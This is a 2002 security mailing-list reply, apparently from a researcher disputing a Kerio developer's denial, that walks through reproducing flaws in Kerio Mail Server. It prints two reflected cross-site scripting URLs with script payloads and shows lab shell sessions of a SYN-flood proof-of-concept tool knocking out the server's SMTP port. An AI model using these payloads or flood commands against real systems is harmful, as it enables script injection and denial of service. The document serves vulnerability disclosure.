Re: Kerio Mail Server Multiple Security vulnerabilities

["Abraham Lincoln" <sunninja () scientist com>]

Hi.

  This is a straight forward answer to what Mr.  Jaroslav Snajdr  of
Kerio.com mail server dev is claiming that kerio mail server is not
vulnerable. To clear things up and let the people judge.


    by the way Mr. Snajdr im recieving emails that they confirmed
that the vulnerability in ur product DO EXIST. anyway i'll proceed to
the explanation in reproducing the vulnerability.

  We will show u if this advisory is real or Not Bec. We Wil be
Releasing Another SECURITY ADVISORY against newest version of Kerio
Mail Server.

   1] Cross-Site Scripting Vulnerability with Kerio
"secure" Web Mail module.

   Try this:
      http://keriowebmail/<script>alert('THisIsREAL0wned')</script>

Even Page 404 is vulnerable? funny. Mr. Kevin of spidy thanks ;) 
 
 Another Sample:
         http://keriowebmail/passwd<script>alert('VERYVULNERABLE')</script>
 
 funny ;)
 
   SO Kerio is not vulnerable with Cross-site scripting? ;P now u g0t
idea how to recode ur InSecure coding style. Want to know more about
Crossite-scripting? REad the FAQ always and search it in google. ;p

    Other is not yet to be devulge it will be released on the next
advisory this Week ;) 

  2] DOS Vulnerability with Every Kerio Mail Server Services.

        Some people think (*shrrug*) that Securing the TCP/IP stack
of the Operating system could Protect their Application against DOS.
Let people judge:

Test Bed:  [*nix with synflood)<----------->[Winnt with sp6A
/Win2k Sp3 with Kerio Mailserver] (note: all win servers are hardened
;)

synmail = our synflood Proof of Concept Code 
Kerio Mail Server IP = 192.168.0.1
Sendmail IP = 192.168.0.2     

  [root@NSSIlabs]# ./synmail 
   ./synmail <destinationIP> <Port> <num of packets>

   [root@NSSIlabs]# ./synmail 192.168.0.1 25 40
   Targeting host 192.168.0.1 .......
   done!
   
  [root@NSSIlabs]# telnet 192.168.0.1 25
  Trying 192.168.0.1...
  telnet: Unable to connect to remote host: Connection refused

  [root@NSSIlabs]# nc 192.168.0.1 25
   
  note: no reply from netcat ;) meaning port is closed after
targeting port 25 with 40 syn packets

   Vulnerable or No? ;) 

 Another Testing Against Other mail server: (against sendmail) ;)

   [root@NSSIlabs]# ./synmail 
   ./synmail <destinationIP> <Port> <num of packets>

   [root@NSSIlabs]# ./synmail 192.168.0.2 25 50
   Targeting host 192.168.0.2 .......
   done!

Note: as u would notice we increase syn packets to 50. ;)
   
  [root@SunNinja remote]# telnet 192.168.0.2 25
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
220 nssilabs.nssolution.COM ESMTP Sendmail 8.9.3/8.9.3; Wed, 28 Aug
2002 03:14:3
7 +0800

   Its for you to judge if this is wrong or right. People who's
reading this may test it on their own ;)
          
   We will be releasing another Security Advisory regarding Newest
version of Kerio Mail Server ;) 

   Hey Mr. Snajdr if u think that this demo is not acceptable or so..
there's nothing we can do about it. We just found a flaw in your
application and we inform you about it before releasing the advisory
for u to release patch but unfortunately We recieve emails from you
that this vulnerability report is fake. anyway people who's reading
this will be the one to judge ;)

   Thanks and good day! ;)
   
Regards,
Abraham
NSSI Research Labs
"When They say that their Technology is Un-Breakable they are
Lying..." - Bruce       
    
-- 
__________________________________________________________
Sign-up for your own FREE Personalized E-mail at Mail.com
http://www.mail.com/?sr=signup